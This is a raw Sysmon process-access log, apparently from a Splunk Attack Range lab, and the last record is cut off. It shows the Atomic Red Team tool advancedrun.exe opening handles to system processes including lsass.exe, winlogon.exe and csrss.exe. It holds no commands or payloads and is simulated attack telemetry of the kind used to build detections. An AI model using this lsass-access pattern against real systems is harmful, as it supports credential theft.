10341000x80000000000000003983749Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983748Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983747Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983746Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983745Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983744Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983743Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003983742Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983741Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983740Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983739Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983738Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983737Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983736Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983735Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983734Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983733Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 